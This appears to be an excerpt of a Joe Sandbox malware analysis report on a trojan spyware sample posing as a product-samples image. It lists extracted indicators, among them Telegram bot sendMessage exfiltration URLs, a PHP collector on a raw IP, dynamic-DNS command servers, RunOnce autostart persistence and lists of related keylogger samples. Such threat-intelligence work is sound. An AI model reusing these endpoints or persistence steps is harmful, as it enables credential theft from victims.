                          https://www.google.com/chromeGoogleDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DC8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.office.com/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0GoogleDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20aDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorDrawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.ecosia.org/newtab/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/favicon.icoDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://smtp.zoho.euDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://aborters.duckdns.org:8081Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/chrome/GoogleDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorDrawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/chromeDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.38.247.67:8081/_send_.php?LDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslashDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://anotherarmy.dns.army:8081Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=baDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB3000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E04000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/79.127.132.20$Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.telegram.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://gemini.google.com/app?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          185.230.214.164
                          		smtp.zoho.euNetherlands
                          		41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHtrue
                          158.101.44.242
                          		checkip.dyndns.comUnited States
                          		31898ORACLE-BMC-31898USfalse
                          64.188.18.75
                          		unknownUnited States
                          		8100ASN-QUADRANET-GLOBALUSfalse
                          172.67.177.134
                          		reallyfreegeoip.orgUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1516835
                          Start date and time:2024-09-24 16:27:38 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 17m 27s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Run name:Suspected Instruction Hammering
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Drawing_Products_Materials_and_Samples_IMG.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/14@4/5
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 221
                          • Number of non-executed functions: 131
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, nexusrules.officeapps.live.com
                          • Execution Graph export aborted for target Drawing_Products_Materials_and_Samples_IMG.exe, PID 3392 because it is empty
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Drawing_Products_Materials_and_Samples_IMG.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          16:31:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce file C:\Users\user\AppData\Roaming\stub\Sophia.exe
                          16:31:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce file C:\Users\user\AppData\Roaming\stub\Sophia.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                              Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                JrBeso.exeGet hashmaliciousXWormBrowse
                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    lpg.cmdGet hashmaliciousXWormBrowse
                                      ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                        9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                          dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              185.230.214.164CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeGet hashmaliciousGuLoaderBrowse
                                                CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                  Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    Orden#46789_2024_Optoflux_mexico_sderls.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                      okPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                                                        RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                                                          RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                                                            RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                                                              INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                                VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                                  158.101.44.242Enquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Arca Defense A.S_ sipari#U015fi UTR01072410 - Eu-CRSP0177462170924.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Bank Receipt Voucher.jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  FACTURAS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  hsbc swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Quote RF-E68-STD-094.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  new shipment details.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  checkip.dyndns.comEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  24924_Payment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  api.telegram.orgZiraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  JrBeso.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lpg.cmdGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  smtp.zoho.euCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 185.230.214.164
                                                                  CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.214.164
                                                                  INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.212.164
                                                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.212.164
                                                                  Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.214.164
                                                                  Orden#46789_2024_Optoflux_mexico_sderlsTY.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                  • 185.230.214.164
                                                                  reallyfreegeoip.orgEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  24924_Payment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.96.3

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TELEGRAMRUZiraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                  • 149.154.167.220
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.99
                                                                  JrBeso.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lpg.cmdGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  COMPUTERLINEComputerlineSchlierbachSwitzerlandCHhttps://linklock.titanhq.com/analyse?url=https%3A%2F%2Femaze.me%2Fzinninsurance%23untitled2&data=eJxdjMEKwjAQRL-mOYa20RgPOXgpVUT8hbgJGEw2ZbNB6NebszCHN_BmwGp1Pk1HbUZtzCS8hYK1JQYXSELJItv5vj4q4fN6W7-iWiqviMNhpOY_ETcqvgHHvpIYWJCFlEtCR135_2r2zbzVQV2GeekJ2e1B5tBxj4ix2-QQelcNOXIKfv4BXds4OQ%%Get hashmaliciousUnknownBrowse
                                                                  • 89.36.170.147
                                                                  CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 185.230.214.164
                                                                  CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.214.164
                                                                  https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                                                                  • 89.36.170.147
                                                                  INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.230.212.164
                                                                  bat.batGet hashmaliciousAsyncRAT, DcRat, PureLog Stealer, XWorm, zgRATBrowse
                                                                  • 185.230.212.169
                                                                  File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 185.230.212.164
                                                                  ASN-QUADRANET-GLOBALUS11062370MXQRQ353000718_001.docGet hashmaliciousUnknownBrowse
                                                                  • 66.63.187.123
                                                                  http://closingdocuments.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 104.194.214.213
                                                                  swift.docGet hashmaliciousNanocoreBrowse
                                                                  • 66.63.187.123
                                                                  ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 192.161.184.44
                                                                  jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                                  • 195.80.56.3
                                                                  NO7367027738832_789257820.docGet hashmaliciousAgentTeslaBrowse
                                                                  • 66.63.187.123
                                                                  NO7367027738832_789257820.docGet hashmaliciousAgentTeslaBrowse
                                                                  • 66.63.187.123
                                                                  ORDER.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 107.150.19.141
                                                                  Overdoers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 64.188.18.75
                                                                  Pedido_52038923_CotizacionS_max2024.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 107.150.19.141
                                                                  ORACLE-BMC-31898USEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
